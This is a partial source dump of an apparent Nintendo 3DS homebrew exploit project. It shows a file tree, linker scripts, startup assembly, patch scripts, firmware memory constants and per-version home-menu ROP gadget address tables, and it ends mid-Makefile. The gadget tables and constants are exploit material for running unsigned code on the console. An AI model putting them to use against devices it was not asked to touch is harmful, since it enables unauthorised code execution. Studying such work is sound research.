├── scripts ├── .gitignore ├── qrcode.exe ├── extractPatch.py ├── fixCRRpatch.py ├── fixCRO.py ├── makePatches.py ├── obfuscator5000.py ├── buildAll.py ├── makeROP.py ├── makeHeaders.py ├── portRopDb.py ├── blowfish.py ├── buildVersion.py ├── crypt.py ├── compress.py └── lzss3.py ├── cn_secondary_payload ├── build │ └── empty ├── source │ ├── font_bin.h │ ├── text.h │ ├── crt0.s │ ├── text.c │ └── font.c ├── ccd00.specs ├── ccd00.ld ├── otherapp.ld └── Makefile ├── cn_qr_initial_loader ├── JPN │ ├── cn_initial │ │ ├── .gitignore │ │ ├── source │ │ │ ├── font_bin.h │ │ │ ├── text.h │ │ │ ├── crt0.s │ │ │ ├── text.c │ │ │ ├── main.c │ │ │ └── font.c │ │ ├── ccd00.specs │ │ ├── ccd00.ld │ │ └── Makefile │ ├── sploit_proto.bin │ ├── Makefile │ └── sploit.s ├── WEST │ ├── cn_initial │ │ ├── .gitignore │ │ ├── source │ │ │ ├── font_bin.h │ │ │ ├── text.h │ │ │ ├── crt0.s │ │ │ ├── text.c │ │ │ └── main.c │ │ ├── ccd00.specs │ │ ├── ccd00.ld │ │ └── Makefile │ ├── sploit_proto.bin │ ├── Makefile │ └── sploit.s └── Makefile ├── cn_constants ├── JPN │ ├── Makefile │ └── constants.txt ├── WEST │ ├── Makefile │ └── constants.txt └── Makefile ├── cn_save_initial_loader ├── JPN │ ├── cn_initial │ │ ├── source │ │ │ ├── font_bin.h │ │ │ ├── text.h │ │ │ ├── crt0.s │ │ │ ├── text.c │ │ │ └── main.c │ │ ├── ccd00.specs │ │ ├── ccd00.ld │ │ └── Makefile │ ├── sploit_proto.bin │ ├── Makefile │ └── sploit.s ├── WEST │ ├── cn_initial │ │ ├── source │ │ │ ├── font_bin.h │ │ │ ├── text.h │ │ │ ├── crt0.s │ │ │ ├── text.c │ │ │ └── main.c │ │ ├── ccd00.specs │ │ ├── ccd00.ld │ │ └── Makefile │ ├── sploit_proto.bin │ ├── Makefile │ └── sploit.s └── Makefile ├── firm_constants ├── N3DS │ ├── Makefile │ └── constants.txt ├── POST5 │ ├── Makefile │ └── constants.txt ├── PRE5 │ ├── Makefile │ └── constants.txt └── Makefile ├── web ├── images │ ├── pic.png │ ├── ninjhax3.png │ └── ninjhax3_128.png ├── qr_code.php ├── hbrew.css └── index.html ├── menu_ropdb ├── 11272 │ └── ropdb.txt ├── 12288 │ 
└── ropdb.txt ├── 13330 │ └── ropdb.txt ├── 15360 │ └── ropdb.txt ├── 16404 │ └── ropdb.txt ├── 17415 │ └── ropdb.txt ├── 19456 │ └── ropdb.txt ├── Makefile ├── 20480_usa │ └── ropdb.txt └── 17415_proto │ └── ropdb.txt ├── menu_payload ├── Makefile ├── menu_payload_loadropbin.s └── menu_payload_regionfree.s ├── README.md └── Makefile /scripts/.gitignore: -------------------------------------------------------------------------------- 1 | *.pyc 2 | -------------------------------------------------------------------------------- /cn_secondary_payload/build/empty: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /cn_secondary_payload/source/font_bin.h: -------------------------------------------------------------------------------- 1 | extern const u8 font_bin[]; -------------------------------------------------------------------------------- /cn_qr_initial_loader/JPN/cn_initial/.gitignore: -------------------------------------------------------------------------------- 1 | build 2 | *.elf 3 | *.map 4 | -------------------------------------------------------------------------------- /cn_qr_initial_loader/WEST/cn_initial/.gitignore: -------------------------------------------------------------------------------- 1 | build 2 | *.elf 3 | *.map 4 | -------------------------------------------------------------------------------- /cn_constants/JPN/Makefile: -------------------------------------------------------------------------------- 1 | all: constants.txt 2 | 3 | constants.txt: 4 | clean: 5 | -------------------------------------------------------------------------------- /cn_qr_initial_loader/JPN/cn_initial/source/font_bin.h: -------------------------------------------------------------------------------- 1 | extern const u8 font_bin[]; -------------------------------------------------------------------------------- 
/cn_qr_initial_loader/WEST/cn_initial/source/font_bin.h: -------------------------------------------------------------------------------- 1 | extern const u8 font_bin[]; -------------------------------------------------------------------------------- /cn_save_initial_loader/JPN/cn_initial/source/font_bin.h: -------------------------------------------------------------------------------- 1 | extern const u8 font_bin[]; -------------------------------------------------------------------------------- /cn_save_initial_loader/WEST/cn_initial/source/font_bin.h: -------------------------------------------------------------------------------- 1 | extern const u8 font_bin[]; -------------------------------------------------------------------------------- /cn_constants/WEST/Makefile: -------------------------------------------------------------------------------- 1 | all: constants.txt 2 | 3 | constants.txt: 4 | clean: 5 | -------------------------------------------------------------------------------- /firm_constants/N3DS/Makefile: -------------------------------------------------------------------------------- 1 | all: constants.txt 2 | 3 | constants.txt: 4 | clean: 5 | -------------------------------------------------------------------------------- /firm_constants/POST5/Makefile: -------------------------------------------------------------------------------- 1 | all: constants.txt 2 | 3 | constants.txt: 4 | clean: 5 | -------------------------------------------------------------------------------- /firm_constants/PRE5/Makefile: -------------------------------------------------------------------------------- 1 | all: constants.txt 2 | 3 | constants.txt: 4 | clean: 5 | -------------------------------------------------------------------------------- /scripts/qrcode.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/smealum/regionFOUR/HEAD/scripts/qrcode.exe 
-------------------------------------------------------------------------------- /web/images/pic.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/smealum/regionFOUR/HEAD/web/images/pic.png -------------------------------------------------------------------------------- /web/images/ninjhax3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/smealum/regionFOUR/HEAD/web/images/ninjhax3.png -------------------------------------------------------------------------------- /cn_secondary_payload/ccd00.specs: -------------------------------------------------------------------------------- 1 | %rename link old_link 2 | 3 | *link: 4 | %(old_link) -T ./ccd00.ld%s 5 | -------------------------------------------------------------------------------- /web/images/ninjhax3_128.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/smealum/regionFOUR/HEAD/web/images/ninjhax3_128.png -------------------------------------------------------------------------------- /cn_qr_initial_loader/JPN/cn_initial/ccd00.specs: -------------------------------------------------------------------------------- 1 | %rename link old_link 2 | 3 | *link: 4 | %(old_link) -T ./ccd00.ld%s 5 | -------------------------------------------------------------------------------- /cn_qr_initial_loader/WEST/cn_initial/ccd00.specs: -------------------------------------------------------------------------------- 1 | %rename link old_link 2 | 3 | *link: 4 | %(old_link) -T ./ccd00.ld%s 5 | -------------------------------------------------------------------------------- /cn_save_initial_loader/JPN/cn_initial/ccd00.specs: -------------------------------------------------------------------------------- 1 | %rename link old_link 2 | 3 | *link: 4 | %(old_link) -T ./ccd00.ld%s 5 | 
-------------------------------------------------------------------------------- /cn_save_initial_loader/WEST/cn_initial/ccd00.specs: -------------------------------------------------------------------------------- 1 | %rename link old_link 2 | 3 | *link: 4 | %(old_link) -T ./ccd00.ld%s 5 | -------------------------------------------------------------------------------- /cn_qr_initial_loader/JPN/sploit_proto.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/smealum/regionFOUR/HEAD/cn_qr_initial_loader/JPN/sploit_proto.bin -------------------------------------------------------------------------------- /cn_qr_initial_loader/WEST/sploit_proto.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/smealum/regionFOUR/HEAD/cn_qr_initial_loader/WEST/sploit_proto.bin -------------------------------------------------------------------------------- /cn_save_initial_loader/JPN/sploit_proto.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/smealum/regionFOUR/HEAD/cn_save_initial_loader/JPN/sploit_proto.bin -------------------------------------------------------------------------------- /cn_save_initial_loader/WEST/sploit_proto.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/smealum/regionFOUR/HEAD/cn_save_initial_loader/WEST/sploit_proto.bin -------------------------------------------------------------------------------- /menu_ropdb/Makefile: -------------------------------------------------------------------------------- 1 | all: ropdb.txt 2 | 3 | clean: 4 | @rm -f ropdb.txt 5 | @echo "all cleaned up !" 
6 | 7 | ropdb.txt: 8 | @cp $(MENUVERSION)/$@ ./ 9 | -------------------------------------------------------------------------------- /cn_secondary_payload/source/text.h: -------------------------------------------------------------------------------- 1 | #ifndef TEXT_H 2 | #define TEXT_H 3 | 4 | void drawCharacter(u8* fb, char c, u16 x, u16 y); 5 | void drawString(u8* fb, char* str, u16 x, u16 y); 6 | 7 | #endif 8 | -------------------------------------------------------------------------------- /cn_qr_initial_loader/JPN/cn_initial/source/text.h: -------------------------------------------------------------------------------- 1 | #ifndef TEXT_H 2 | #define TEXT_H 3 | 4 | void drawCharacter(u8* fb, char c, u16 x, u16 y); 5 | void drawString(u8* fb, char* str, u16 x, u16 y); 6 | 7 | #endif 8 | -------------------------------------------------------------------------------- /cn_qr_initial_loader/WEST/cn_initial/source/text.h: -------------------------------------------------------------------------------- 1 | #ifndef TEXT_H 2 | #define TEXT_H 3 | 4 | void drawCharacter(u8* fb, char c, u16 x, u16 y); 5 | void drawString(u8* fb, char* str, u16 x, u16 y); 6 | 7 | #endif 8 | -------------------------------------------------------------------------------- /cn_save_initial_loader/JPN/cn_initial/source/text.h: -------------------------------------------------------------------------------- 1 | #ifndef TEXT_H 2 | #define TEXT_H 3 | 4 | void drawCharacter(u8* fb, char c, u16 x, u16 y); 5 | void drawString(u8* fb, char* str, u16 x, u16 y); 6 | 7 | #endif 8 | -------------------------------------------------------------------------------- /cn_save_initial_loader/WEST/cn_initial/source/text.h: -------------------------------------------------------------------------------- 1 | #ifndef TEXT_H 2 | #define TEXT_H 3 | 4 | void drawCharacter(u8* fb, char c, u16 x, u16 y); 5 | void drawString(u8* fb, char* str, u16 x, u16 y); 6 | 7 | #endif 8 | 
-------------------------------------------------------------------------------- /cn_constants/Makefile: -------------------------------------------------------------------------------- 1 | all: constants.txt 2 | 3 | clean: 4 | @rm -f constants.txt 5 | @cd WEST && make clean 6 | @cd JPN && make clean 7 | @echo "all cleaned up !" 8 | 9 | constants.txt: 10 | @cd $(CNVERSION) && make 11 | @cp $(CNVERSION)/$@ ./ 12 | -------------------------------------------------------------------------------- /cn_secondary_payload/ccd00.ld: -------------------------------------------------------------------------------- 1 | OUTPUT_ARCH(arm) 2 | 3 | MEMORY 4 | { 5 | RAMRO (rx) : ORIGIN = 0x00108000, LENGTH = 0x0000A000 6 | } 7 | 8 | SECTIONS 9 | { 10 | .text : ALIGN(0x1000) { 11 | build/crt0.o(.init) 12 | *(.text) 13 | } 14 | } 15 | 16 | -------------------------------------------------------------------------------- /cn_secondary_payload/otherapp.ld: -------------------------------------------------------------------------------- 1 | OUTPUT_ARCH(arm) 2 | 3 | MEMORY 4 | { 5 | RAMRO (rx) : ORIGIN = 0x00101000, LENGTH = 0x0000A000 6 | } 7 | 8 | SECTIONS 9 | { 10 | .text : ALIGN(0x1000) { 11 | build/crt0.o(.init) 12 | *(.text) 13 | } 14 | } 15 | 16 | -------------------------------------------------------------------------------- /firm_constants/Makefile: -------------------------------------------------------------------------------- 1 | all: constants.txt 2 | 3 | clean: 4 | @rm -f constants.txt 5 | @cd PRE5 && make clean 6 | @cd POST5 && make clean 7 | @cd N3DS && make clean 8 | @echo "all cleaned up !" 
9 | 10 | constants.txt: 11 | @cd $(FIRMVERSION) && make 12 | @cp $(FIRMVERSION)/$@ ./ 13 | -------------------------------------------------------------------------------- /cn_qr_initial_loader/JPN/cn_initial/ccd00.ld: -------------------------------------------------------------------------------- 1 | OUTPUT_ARCH(arm) 2 | 3 | MEMORY 4 | { 5 | RAMX (rx) : ORIGIN = 0x00180000, LENGTH = 0x1000 6 | } 7 | 8 | SECTIONS 9 | { 10 | /*.text : ALIGN(0x1000) {*/ 11 | .text : ALIGN(0x100) { 12 | build/crt0.o(.init) 13 | *(.text) 14 | *(.rodata) 15 | } 16 | } 17 | 18 | -------------------------------------------------------------------------------- /cn_save_initial_loader/JPN/cn_initial/ccd00.ld: -------------------------------------------------------------------------------- 1 | OUTPUT_ARCH(arm) 2 | 3 | MEMORY 4 | { 5 | RAMX (rx) : ORIGIN = 0x00180000, LENGTH = 0x1000 6 | } 7 | 8 | SECTIONS 9 | { 10 | /*.text : ALIGN(0x1000) {*/ 11 | .text : ALIGN(0x100) { 12 | build/crt0.o(.init) 13 | *(.text) 14 | *(.rodata) 15 | } 16 | } 17 | 18 | -------------------------------------------------------------------------------- /firm_constants/N3DS/constants.txt: -------------------------------------------------------------------------------- 1 | [ 2 | ("CN_TEXTPAOFFSET", "0x03E00000"), 3 | ("CN_TEXTPA_OFFSET_FROMEND", "CN_TEXTPAOFFSET-0x04000000"), 4 | 5 | ("FIRM_LINEAROFFSET", "0x10000000"), 6 | ("FIRM_APPMEMALLOC", "0x07C00000"), 7 | 8 | ("FIRM_LINEARSYSTEM", "0x38000000"), 9 | 10 | ("MENU_LOADEDROP_BUFADR", "0x38C40000"), 11 | ] 12 | -------------------------------------------------------------------------------- /firm_constants/POST5/constants.txt: -------------------------------------------------------------------------------- 1 | [ 2 | ("CN_TEXTPAOFFSET", "0x03E00000"), 3 | ("CN_TEXTPA_OFFSET_FROMEND", "CN_TEXTPAOFFSET-0x04000000"), 4 | 5 | ("FIRM_LINEAROFFSET", "-0x0C000000"), 6 | ("FIRM_APPMEMALLOC", "0x04000000"), 7 | 8 | ("FIRM_LINEARSYSTEM", "0x34000000"), 9 | 10 | 
("MENU_LOADEDROP_BUFADR", "0x35040000"), 11 | ] 12 | -------------------------------------------------------------------------------- /firm_constants/PRE5/constants.txt: -------------------------------------------------------------------------------- 1 | [ 2 | ("CN_TEXTPAOFFSET", "0x03DBE000"), 3 | ("CN_TEXTPA_OFFSET_FROMEND", "CN_TEXTPAOFFSET-0x04000000"), 4 | 5 | ("FIRM_LINEAROFFSET", "-0x0C000000"), 6 | ("FIRM_APPMEMALLOC", "0x04000000"), 7 | 8 | ("FIRM_LINEARSYSTEM", "0x34000000"), 9 | 10 | ("MENU_LOADEDROP_BUFADR", "0x35040000"), 11 | ] 12 | -------------------------------------------------------------------------------- /cn_qr_initial_loader/WEST/cn_initial/ccd00.ld: -------------------------------------------------------------------------------- 1 | OUTPUT_ARCH(arm) 2 | 3 | MEMORY 4 | { 5 | /*RAMRO (rx) : ORIGIN = 0x00100000, LENGTH = 0x001DA000*/ 6 | /*RAMRO (rx) : ORIGIN = 0x002D9000, LENGTH = 0x00001000*/ 7 | RAMRO (rx) : ORIGIN = 0x002D9700, LENGTH = 0x00001000 8 | } 9 | 10 | SECTIONS 11 | { 12 | /*.text : ALIGN(0x1000) {*/ 13 | .text : ALIGN(0x100) { 14 | build/crt0.o(.init) 15 | *(.text) 16 | *(.rodata) 17 | } 18 | } 19 | 20 | -------------------------------------------------------------------------------- /cn_save_initial_loader/WEST/cn_initial/ccd00.ld: -------------------------------------------------------------------------------- 1 | OUTPUT_ARCH(arm) 2 | 3 | MEMORY 4 | { 5 | /*RAMRO (rx) : ORIGIN = 0x00100000, LENGTH = 0x001DA000*/ 6 | /*RAMRO (rx) : ORIGIN = 0x002D9000, LENGTH = 0x00001000*/ 7 | RAMRO (rx) : ORIGIN = 0x002D9700, LENGTH = 0x00001000 8 | } 9 | 10 | SECTIONS 11 | { 12 | /*.text : ALIGN(0x1000) {*/ 13 | .text : ALIGN(0x100) { 14 | build/crt0.o(.init) 15 | *(.text) 16 | *(.rodata) 17 | } 18 | } 19 | 20 | -------------------------------------------------------------------------------- /cn_qr_initial_loader/JPN/cn_initial/source/crt0.s: -------------------------------------------------------------------------------- 1 | .section ".init" 
2 | .arm 3 | .align 4 4 | .global _init 5 | .global _start 6 | 7 | _start: 8 | # blx __libc_init_array 9 | # swi 0xa 10 | mov r0, #0 11 | mov r1, #0 12 | mov r2, #0 13 | mov r3, #0 14 | mov r4, #0 15 | mov r5, #0 16 | mov r6, #0 17 | mov r7, #0 18 | mov r8, #0 19 | mov r9, #0 20 | mov r10, #0 21 | mov r11, #0 22 | mov r12, #0 23 | mov sp, #0x10000000 24 | blx _main 25 | 26 | _init: 27 | bx lr 28 | -------------------------------------------------------------------------------- /cn_qr_initial_loader/WEST/cn_initial/source/crt0.s: -------------------------------------------------------------------------------- 1 | .section ".init" 2 | .arm 3 | .align 4 4 | .global _init 5 | .global _start 6 | 7 | _start: 8 | # blx __libc_init_array 9 | # swi 0xa 10 | mov r0, #0 11 | mov r1, #0 12 | mov r2, #0 13 | mov r3, #0 14 | mov r4, #0 15 | mov r5, #0 16 | mov r6, #0 17 | mov r7, #0 18 | mov r8, #0 19 | mov r9, #0 20 | mov r10, #0 21 | mov r11, #0 22 | mov r12, #0 23 | mov sp, #0x10000000 24 | blx _main 25 | 26 | _init: 27 | bx lr 28 | -------------------------------------------------------------------------------- /cn_save_initial_loader/JPN/cn_initial/source/crt0.s: -------------------------------------------------------------------------------- 1 | .section ".init" 2 | .arm 3 | .align 4 4 | .global _init 5 | .global _start 6 | 7 | _start: 8 | # blx __libc_init_array 9 | # swi 0xa 10 | mov r0, #0 11 | mov r1, #0 12 | mov r2, #0 13 | mov r3, #0 14 | mov r4, #0 15 | mov r5, #0 16 | mov r6, #0 17 | mov r7, #0 18 | mov r8, #0 19 | mov r9, #0 20 | mov r10, #0 21 | mov r11, #0 22 | mov r12, #0 23 | mov sp, #0x10000000 24 | blx _main 25 | 26 | _init: 27 | bx lr 28 | -------------------------------------------------------------------------------- /cn_save_initial_loader/WEST/cn_initial/source/crt0.s: -------------------------------------------------------------------------------- 1 | .section ".init" 2 | .arm 3 | .align 4 4 | .global _init 5 | .global _start 6 | 7 | _start: 8 | # blx 
__libc_init_array 9 | # swi 0xa 10 | mov r0, #0 11 | mov r1, #0 12 | mov r2, #0 13 | mov r3, #0 14 | mov r4, #0 15 | mov r5, #0 16 | mov r6, #0 17 | mov r7, #0 18 | mov r8, #0 19 | mov r9, #0 20 | mov r10, #0 21 | mov r11, #0 22 | mov r12, #0 23 | mov sp, #0x10000000 24 | blx _main 25 | 26 | _init: 27 | bx lr 28 | -------------------------------------------------------------------------------- /scripts/extractPatch.py: -------------------------------------------------------------------------------- 1 | import sys 2 | 3 | def getWord(b, k, n=4): 4 | return sum(list(map(lambda c: b[k+c]<<(c*8),range(n)))) 5 | 6 | origfn=sys.argv[1] 7 | patchfn=sys.argv[2] 8 | outfn=sys.argv[3] 9 | offset=int(sys.argv[4], 0) 10 | end_offset=int(sys.argv[5], 0) 11 | 12 | origdata=bytearray(open(origfn,"rb").read()) 13 | patchdata=bytearray(open(patchfn,"rb").read()) 14 | 15 | if len(sys.argv)>6: 16 | size=int(sys.argv[5], 0) 17 | else: 18 | k=end_offset 19 | while getWord(origdata,k-4)==getWord(patchdata,k-4): 20 | k-=4 21 | size=k-offset 22 | 23 | open(outfn,"wb").write(patchdata[offset:(offset+size)]) 24 | -------------------------------------------------------------------------------- /cn_secondary_payload/source/crt0.s: -------------------------------------------------------------------------------- 1 | .section ".init" 2 | .arm 3 | .align 4 4 | .global _init 5 | .global _start 6 | 7 | _start: 8 | # blx __libc_init_array 9 | # don't clear r0 in order to protect mode arg 10 | # mov r0, #0 11 | mov r1, #0 12 | mov r2, #0 13 | mov r3, #0 14 | mov r4, #0 15 | mov r5, #0 16 | mov r6, #0 17 | mov r7, #0 18 | mov r8, #0 19 | mov r9, #0 20 | mov r10, #0 21 | mov r11, #0 22 | mov r12, #0 23 | mov sp, #0x10000000 24 | push {r0} @ Write r0 to the very top of the stack, so that code elsewhere can load that value globally via a fixed address. 
25 | blx main 26 | 27 | _init: 28 | bx lr 29 | -------------------------------------------------------------------------------- /menu_ropdb/11272/ropdb.txt: -------------------------------------------------------------------------------- 1 | [ 2 | ("ROP_MENU_POP_PC", "0x102028"), 3 | ("ROP_MENU_POP_R0PC", "0x157554"), 4 | ("ROP_MENU_POP_R1PC", "0x2149f0"), 5 | ("ROP_MENU_POP_R2R3R4R5R6PC", "0x150108"), 6 | ("ROP_MENU_POP_R4R5PC", "0x102468"), 7 | ("ROP_MENU_STACK_PIVOT", "0x100fdc"), 8 | ("ROP_MENU_LDR_R0R0_POP_R4PC", "0x123260"), 9 | ("ROP_MENU_STREQ_R5R2x30_POP_R4R5R6PC", "0x154e9c"), 10 | ("ROP_MENU_AND_R0R0R4_POP_R4R5R6R7R8PC", "0x122e1c"), 11 | ("ROP_MENU_CMP_R0R1_MVNLS_R0x0_MOVHI_R0x1_POP_R4PC", "0x1fc154"), 12 | ("ROP_MENU_SLEEPTHREAD", "0x12e64c"), 13 | ("ROP_MENU_NSS_REBOOT", "0x139878"), 14 | ("MENU_NSS_HANDLE", "0x2f1f98"), 15 | ] 16 | -------------------------------------------------------------------------------- /menu_ropdb/12288/ropdb.txt: -------------------------------------------------------------------------------- 1 | [ 2 | ("ROP_MENU_POP_PC", "0x102028"), 3 | ("ROP_MENU_POP_R0PC", "0x1575ac"), 4 | ("ROP_MENU_POP_R1PC", "0x214988"), 5 | ("ROP_MENU_POP_R2R3R4R5R6PC", "0x150160"), 6 | ("ROP_MENU_POP_R4R5PC", "0x102468"), 7 | ("ROP_MENU_STACK_PIVOT", "0x100fdc"), 8 | ("ROP_MENU_LDR_R0R0_POP_R4PC", "0x123260"), 9 | ("ROP_MENU_STREQ_R5R2x30_POP_R4R5R6PC", "0x154ef4"), 10 | ("ROP_MENU_AND_R0R0R4_POP_R4R5R6R7R8PC", "0x122e1c"), 11 | ("ROP_MENU_CMP_R0R1_MVNLS_R0x0_MOVHI_R0x1_POP_R4PC", "0x1fc0ec"), 12 | ("ROP_MENU_SLEEPTHREAD", "0x12e64c"), 13 | ("ROP_MENU_NSS_REBOOT", "0x139878"), 14 | ("MENU_NSS_HANDLE", "0x2f0f98"), 15 | ] 16 | -------------------------------------------------------------------------------- /menu_ropdb/13330/ropdb.txt: -------------------------------------------------------------------------------- 1 | [ 2 | ("ROP_MENU_POP_PC", "0x10203c"), 3 | ("ROP_MENU_POP_R0PC", "0x154f0c"), 4 | ("ROP_MENU_POP_R1PC", "0x2262bc"), 5 | 
("ROP_MENU_POP_R2R3R4R5R6PC", "0x1512c4"), 6 | ("ROP_MENU_POP_R4R5PC", "0x102470"), 7 | ("ROP_MENU_STACK_PIVOT", "0x100fdc"), 8 | ("ROP_MENU_LDR_R0R0_POP_R4PC", "0x1235cc"), 9 | ("ROP_MENU_STREQ_R5R2x30_POP_R4R5R6PC", "0x1525c8"), 10 | ("ROP_MENU_AND_R0R0R4_POP_R4R5R6R7R8PC", "0x123144"), 11 | ("ROP_MENU_CMP_R0R1_MVNLS_R0x0_MOVHI_R0x1_POP_R4PC", "0x20a4e8"), 12 | ("ROP_MENU_SLEEPTHREAD", "0x12b590"), 13 | ("ROP_MENU_NSS_REBOOT", "0x136a10"), 14 | ("MENU_NSS_HANDLE", "0x314018"), 15 | ] 16 | -------------------------------------------------------------------------------- /menu_ropdb/15360/ropdb.txt: -------------------------------------------------------------------------------- 1 | [ 2 | ("ROP_MENU_POP_PC", "0x10203c"), 3 | ("ROP_MENU_POP_R0PC", "0x154ef0"), 4 | ("ROP_MENU_POP_R1PC", "0x226264"), 5 | ("ROP_MENU_POP_R2R3R4R5R6PC", "0x1512b4"), 6 | ("ROP_MENU_POP_R4R5PC", "0x102470"), 7 | ("ROP_MENU_STACK_PIVOT", "0x100fdc"), 8 | ("ROP_MENU_LDR_R0R0_POP_R4PC", "0x1235c0"), 9 | ("ROP_MENU_STREQ_R5R2x30_POP_R4R5R6PC", "0x1525ac"), 10 | ("ROP_MENU_AND_R0R0R4_POP_R4R5R6R7R8PC", "0x123138"), 11 | ("ROP_MENU_CMP_R0R1_MVNLS_R0x0_MOVHI_R0x1_POP_R4PC", "0x20a474"), 12 | ("ROP_MENU_SLEEPTHREAD", "0x12b584"), 13 | ("ROP_MENU_NSS_REBOOT", "0x136a04"), 14 | ("MENU_NSS_HANDLE", "0x314018"), 15 | ] 16 | -------------------------------------------------------------------------------- /menu_ropdb/16404/ropdb.txt: -------------------------------------------------------------------------------- 1 | [ 2 | ("ROP_MENU_POP_PC", "0x10201c"), 3 | ("ROP_MENU_POP_R0PC", "0x1576d4"), 4 | ("ROP_MENU_POP_R1PC", "0x237040"), 5 | ("ROP_MENU_POP_R2R3R4R5R6PC", "0x1502c8"), 6 | ("ROP_MENU_POP_R4R5PC", "0x102458"), 7 | ("ROP_MENU_STACK_PIVOT", "0x100fb8"), 8 | ("ROP_MENU_LDR_R0R0_POP_R4PC", "0x11f62c"), 9 | ("ROP_MENU_STREQ_R5R2x30_POP_R4R5R6PC", "0x154fb8"), 10 | ("ROP_MENU_AND_R0R0R4_POP_R4R5R6R7R8PC", "0x11f1a4"), 11 | ("ROP_MENU_CMP_R0R1_MVNLS_R0x0_MOVHI_R0x1_POP_R4PC", "0x21e7f4"), 12 | 
("ROP_MENU_SLEEPTHREAD", "0x12b0a0"), 13 | ("ROP_MENU_NSS_REBOOT", "0x1373ec"), 14 | ("MENU_NSS_HANDLE", "0x32f048"), 15 | ] 16 | -------------------------------------------------------------------------------- /menu_ropdb/17415/ropdb.txt: -------------------------------------------------------------------------------- 1 | [ 2 | ("ROP_MENU_POP_PC", "0x10201c"), 3 | ("ROP_MENU_POP_R0PC", "0x157818"), 4 | ("ROP_MENU_POP_R1PC", "0x236efc"), 5 | ("ROP_MENU_POP_R2R3R4R5R6PC", "0x15040c"), 6 | ("ROP_MENU_POP_R4R5PC", "0x102458"), 7 | ("ROP_MENU_STACK_PIVOT", "0x100fb8"), 8 | ("ROP_MENU_LDR_R0R0_POP_R4PC", "0x11f5d0"), 9 | ("ROP_MENU_STREQ_R5R2x30_POP_R4R5R6PC", "0x1550fc"), 10 | ("ROP_MENU_AND_R0R0R4_POP_R4R5R6R7R8PC", "0x11f148"), 11 | ("ROP_MENU_CMP_R0R1_MVNLS_R0x0_MOVHI_R0x1_POP_R4PC", "0x21e6cc"), 12 | ("ROP_MENU_SLEEPTHREAD", "0x12b044"), 13 | ("ROP_MENU_NSS_REBOOT", "0x137390"), 14 | ("MENU_NSS_HANDLE", "0x32e040"), 15 | ] 16 | -------------------------------------------------------------------------------- /menu_ropdb/19456/ropdb.txt: -------------------------------------------------------------------------------- 1 | [ 2 | ("ROP_MENU_POP_PC", "0x10201c"), 3 | ("ROP_MENU_POP_R0PC", "0x157848"), 4 | ("ROP_MENU_POP_R1PC", "0x237004"), 5 | ("ROP_MENU_POP_R2R3R4R5R6PC", "0x15043c"), 6 | ("ROP_MENU_POP_R4R5PC", "0x102458"), 7 | ("ROP_MENU_STACK_PIVOT", "0x100fb8"), 8 | ("ROP_MENU_LDR_R0R0_POP_R4PC", "0x11f5fc"), 9 | ("ROP_MENU_STREQ_R5R2x30_POP_R4R5R6PC", "0x15512c"), 10 | ("ROP_MENU_AND_R0R0R4_POP_R4R5R6R7R8PC", "0x11f174"), 11 | ("ROP_MENU_CMP_R0R1_MVNLS_R0x0_MOVHI_R0x1_POP_R4PC", "0x21e7d4"), 12 | ("ROP_MENU_SLEEPTHREAD", "0x12b070"), 13 | ("ROP_MENU_NSS_REBOOT", "0x1373bc"), 14 | ("MENU_NSS_HANDLE", "0x32e040"), 15 | ] 16 | -------------------------------------------------------------------------------- /menu_ropdb/20480_usa/ropdb.txt: -------------------------------------------------------------------------------- 1 | [ 2 | ("ROP_MENU_POP_PC", "0x10201c"), 3 | 
("ROP_MENU_POP_R0PC", "0x157848"), 4 | ("ROP_MENU_POP_R1PC", "0x236ebc"), 5 | ("ROP_MENU_POP_R2R3R4R5R6PC", "0x15043c"), 6 | ("ROP_MENU_POP_R4R5PC", "0x102458"), 7 | ("ROP_MENU_STACK_PIVOT", "0x100fb8"), 8 | ("ROP_MENU_LDR_R0R0_POP_R4PC", "0x11f5fc"), 9 | ("ROP_MENU_STREQ_R5R2x30_POP_R4R5R6PC", "0x15512c"), 10 | ("ROP_MENU_AND_R0R0R4_POP_R4R5R6R7R8PC", "0x11f174"), 11 | ("ROP_MENU_CMP_R0R1_MVNLS_R0x0_MOVHI_R0x1_POP_R4PC", "0x21e68c"), 12 | ("ROP_MENU_SLEEPTHREAD", "0x12b070"), 13 | ("ROP_MENU_NSS_REBOOT", "0x1373bc"), 14 | ("MENU_NSS_HANDLE", "0x32e040"), 15 | ] 16 | -------------------------------------------------------------------------------- /scripts/fixCRRpatch.py: -------------------------------------------------------------------------------- 1 | import os 2 | import sys 3 | import hashlib 4 | sys.path.append(os.path.abspath(os.path.dirname(os.path.abspath(__file__))+"/../build/")) 5 | from constants import * 6 | 7 | def getWord(b, k, n=4): 8 | return sum(list(map(lambda c: b[k+c]<<(c*8),range(n)))) 9 | 10 | def getHash(b, k, n): 11 | return bytearray(hashlib.sha256(crodata[(k):(k+n)]).digest()) 12 | 13 | crofn=sys.argv[1] 14 | crrpatchfn=sys.argv[2] 15 | 16 | crodata=bytearray(open(crofn,"rb").read()) 17 | crrdata=bytearray(b'\x00'*0x20*CRR_HASHES) 18 | hash=getHash(crodata,0x00,0x80) 19 | for i in range(0,0x20*CRR_HASHES,0x20): 20 | crrdata[i:(i+0x20)]=hash 21 | open(crrpatchfn,"wb").write(crrdata) 22 | -------------------------------------------------------------------------------- /cn_qr_initial_loader/Makefile: -------------------------------------------------------------------------------- 1 | ifeq ($(strip $(DEVKITARM)),) 2 | $(error "Please set DEVKITARM in your environment. export DEVKITARM=devkitARM") 3 | endif 4 | 5 | ifeq ($(strip $(CTRULIB)),) 6 | $(error "Please set CTRULIB in your environment. 
